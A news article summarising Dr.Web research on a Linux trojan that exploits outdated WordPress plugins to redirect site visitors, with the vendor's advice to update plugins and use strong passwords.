A previously unknown strain of Linux malware is targeting WordPress based websites, according to research by cybersecurity firm Dr.Web.
The backdoor launches these attacks by exploiting known vulnerabilities in numerous outdated WordPress plugins and themes that can be installed on a website. These include WP Live Chat Support Plugin, WP Live Chat, Google Code Inserter and WP Quick Booking Manager.
The Trojan is remotely controlled by malicious actors, who communicate the address of the website it is to infect via its command and control (C&C) server. Threat actors are also able to remotely switch the malware to standby mode, shut it down and pause logging its actions.
Dr.Web believes the malicious tool could have been used by cyber-criminals for over three years to carry out such attacks and monetize the resale of traffic, or arbitrage.
This means that users will be transferred to the attackers’ website of choice by clicking anywhere on the infected webpage.
The Trojan application tracks the number of websites attacked, every case of a vulnerability being exploited and the number of times it has successfully exploited the WordPress Ultimate FAQ plugin and the Facebook messenger from Zotabox. It also informs the remote server about all detected unpatched vulnerabilities.
It is also able to exploit additional vulnerabilities in a range of plugins, such as Brizy WordPress Plugin, FV Flowplayer Video Player and WordPress Coming Soon Page.
Dr.Web added that both versions of the Trojan contain an “unimplemented” functionality for hacking the administrator accounts of targeted websites through a brute-force attack. This can be achieved by applying known logins and passwords using special vocabularies.
The researchers warned that attackers may be planning to use this functionality for future versions of the malware. “If such an option is implemented in newer versions of the backdoor, cyber-criminals will even be able to successfully attack some of those websites that use current plugin versions with patched vulnerabilities,” they stated.
Dr.Web urged owners of WordPress-based websites to keep all components of their platforms updated, “including third-party add-ons and themes, and also use strong and unique logins and passwords for their accounts.”
With WordPress estimated to be used by around 43% of all websites, this CMS is being heavily targeted by cyber-criminals.
In September 2022, WordPress security-focused company Wordfence published an advisory warning that hackers attempted to exploit a zero-day flaw in a WordPress plugin called BackupBuddy five million times.
A few months earlier, in June 2022, WordPress was forced to update over a million sites to patch a critical vulnerability affecting the Ninja Forms plugin.